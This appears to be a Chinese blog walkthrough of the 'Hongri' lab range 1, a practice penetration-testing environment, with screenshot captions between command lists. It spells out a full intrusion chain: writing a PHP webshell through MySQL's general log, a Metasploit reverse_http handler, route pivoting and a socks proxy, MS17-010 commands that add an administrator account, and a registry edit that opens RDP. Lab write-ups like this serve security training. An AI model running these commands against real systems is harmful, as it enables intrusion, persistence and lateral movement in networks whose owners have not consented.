红日靶场(1)

靶场搭建

红日靶场(1)_第1张图片

红日靶场(1)_第2张图片

红日靶场(1)_第3张图片

红日靶场(1)_第4张图片

渗透测试流程

1.目录扫描:

python3 dirsearch.py -u 网站的url

红日靶场(1)_第5张图片

2. 测试mysql数据库连接密码,并进入phpmyadmin
 

账号:root
密码:root

红日靶场(1)_第6张图片

红日靶场(1)_第7张图片

3.尝试导入一句话木马,发现拒绝导入

select '' into outfile 'C:/phpstudy/www/hack.php'
导入一句话木马

show global variables like '%secure%'
查询有关secure的信息


secure_file_priv null
如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,MySQL服务不会创建它;
如果这个参数为NULL,MySQL服务会禁止导入和导出操作

红日靶场(1)_第8张图片

 红日靶场(1)_第9张图片

4.通过日志写shell,并用蚁剑连接

show global variables like '%gengeral_%'
查询输出有关general信息

set global general_log=ON;
打开日志

set global general_log_file='C:/phpStudy/WWW/hack.php'
更改日志路径


select ''
日志写shell


“MySQL的session和global一般使用在终端,用来对配置进行暂时设置,当数据库服务重启就会失效。

红日靶场(1)_第10张图片

 红日靶场(1)_第11张图片

5.查看当前用户权限为administrators,使用CS上线

红日靶场(1)_第12张图片

红日靶场(1)_第13张图片

红日靶场(1)_第14张图片

红日靶场(1)_第15张图片 6.CS 和MSF联合

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.177.227
set lport 2222
exploit

红日靶场(1)_第16张图片

 红日靶场(1)_第17张图片

 7.发现其他网段,扫描网段主机,创建代理

run autoroute -s 192.168.52.0/24
创建52网段路由

run autoroute -p
查看路由信息

红日靶场(1)_第18张图片

run post/windows/gather/arp_scanner rhosts=192.168.52.0/24

 红日靶场(1)_第19张图片

search socks
查找socks
 
use auxiliary/server/socks_proxy
进入
 
show options
查看信息
 
set VERSION 4a
将版本切换到4a
 
set SRVHOST 192.168.xxx.xxx
将ip设置为当前ip

 红日靶场(1)_第20张图片

7.使用nmap扫描端口,

proxychains nmap -Pn -sT 192.168.52.141

 红日靶场(1)_第21张图片

 8.发现具有445端口,使用MSF17_010模块添加用户,并添加到管理员用户。

use auxiliary/admin/smb/ms17_010_command

set rhosts 192.168.52.141

set COMMAND net user hack Kongbai123 /add

红日靶场(1)_第22张图片

set COMMAND net localgroup administrators
添加到管理员用户

 红日靶场(1)_第23张图片

set COMMAND REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

打开目标及3389端口

 红日靶场(1)_第24张图片

 红日靶场(1)_第25张图片

 9.通过远程桌面连接

proxychains rdesktop 192.168.52.141

红日靶场(1)_第26张图片

 红日靶场(1)_第27张图片

 10.探测域控主机是否开启445端口

红日靶场(1)_第28张图片

利用方法如法炮制,不在复现。

你可能感兴趣的:(靶场复现,php,开发语言)